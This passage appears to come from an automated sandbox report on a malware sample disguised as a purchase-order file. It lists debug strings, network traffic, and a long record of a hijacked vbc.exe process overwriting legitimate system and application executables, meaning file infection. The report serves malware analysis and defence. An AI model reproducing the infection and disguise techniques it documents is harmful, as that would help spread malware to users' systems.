                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49725 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49759 version: TLS 1.0
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000B.00000003.2009762179.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2009857048.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573298301.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573255343.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 0000000B.00000003.2036151480.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 0000000B.00000003.2034574236.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\SpreadsheetCompare.pdb source: alg.exe, 0000000B.00000003.2062072594.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: alg.exe, 0000000B.00000003.1991666348.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2527182119.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000B.00000003.2011798103.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2576506040.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 0000000B.00000003.2036762332.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: vbc.exe, 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection.pdb source: alg.exe, 0000000B.00000003.2060589054.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 0000000B.00000003.2037617501.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000B.00000003.2010753406.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2574637480.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000B.00000003.2002253535.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2563833897.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 0000000B.00000003.2038419292.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 0000000B.00000003.2037851037.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: MicrosoftEdgeUpdate_unsigned.pdb source: alg.exe, 0000000B.00000003.2050845345.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 0000000B.00000003.2037331399.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 0000000B.00000003.2033387100.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000B.00000003.2009762179.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2009857048.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573298301.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573255343.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 0000000B.00000003.2035106637.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 0000000B.00000003.2034574236.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: alg.exe, 0000000B.00000003.2011798103.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2576506040.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 0000000B.00000003.2037004985.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVDllSurrogate32.pdb source: alg.exe, 0000000B.00000003.2053440475.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000B.00000003.2010753406.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2574637480.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 0000000B.00000003.2037331399.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 0000000B.00000003.2031098154.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 0000000B.00000003.2037851037.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 0000000B.00000003.2037004985.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 0000000B.00000003.2035106637.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVlp.pdb source: alg.exe, 0000000B.00000003.2053936657.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection.pdbn#n source: alg.exe, 0000000B.00000003.2060589054.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 0000000B.00000003.2035936901.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 0000000B.00000003.2038419292.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 0000000B.00000003.2036151480.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVDllSurrogate32.pdbGCTL source: alg.exe, 0000000B.00000003.2053440475.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 0000000B.00000003.2033387100.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000B.00000003.2002253535.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2563833897.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 0000000B.00000003.2035579850.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 0000000B.00000003.2036511619.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 0000000B.00000003.2037617501.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 0000000B.00000003.2036762332.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: alg.exe, 0000000B.00000003.1991666348.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2527182119.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\DatabaseCompare.pdb source: alg.exe, 0000000B.00000003.2061513893.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 0000000B.00000003.2035579850.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 0000000B.00000003.2035936901.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 0000000B.00000003.2036511619.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVlp.pdbGCTL source: alg.exe, 0000000B.00000003.2053936657.0000000000B90000.00000004.00001000.00020000.00000000.sdmp

                  Spreading

                  barindex
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F4DF57 FindFirstFileW,9_2_00F4DF57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 4x nop then jmp 0F260B84h0_2_0F260283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h9_2_070BE2D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then mov esp, ebp9_2_09F13C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09F10248h9_2_09F10040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09F10D3Ch9_2_09F10040
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 4x nop then jmp 08E3F64Dh22_2_08E3ED52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h42_2_074BE2D8

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
